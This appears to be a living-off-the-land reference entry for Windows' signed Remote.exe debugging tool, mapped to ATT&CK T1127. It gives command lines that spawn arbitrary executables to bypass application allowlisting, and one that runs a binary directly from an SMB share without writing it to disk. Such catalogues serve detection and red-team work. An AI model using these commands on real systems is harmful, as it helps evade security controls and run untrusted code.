.. /Remote.exe
Debugging tool included with Windows Debugging Tools
Paths:
- C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
- C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
AWL bypass
-
Spawns specified executable as a child process of remote.exe
Remote.exe /s {PATH:.exe} anythinghere
- Use case
- Executes a process under a trusted Microsoft signed binary
- Privileges required
- User
- Operating systems
- Windows
- ATT&CK® technique
- T1127
- Tags
Execute: EXE
Execute
-
Spawns specified executable as a child process of remote.exe
Remote.exe /s {PATH:.exe} anythinghere
- Use case
- Executes a process under a trusted Microsoft signed binary
- Privileges required
- User
- Operating systems
- Windows
- ATT&CK® technique
- T1127
- Tags
Execute: EXE
-
Run a remote file
Remote.exe /s {PATH_SMB:.exe} anythinghere
- Use case
- Executing a remote binary without saving file to disk
- Privileges required
- User
- Operating systems
- Windows
- ATT&CK® technique
- T1127
- Tags
Execute: EXE
Execute: Remote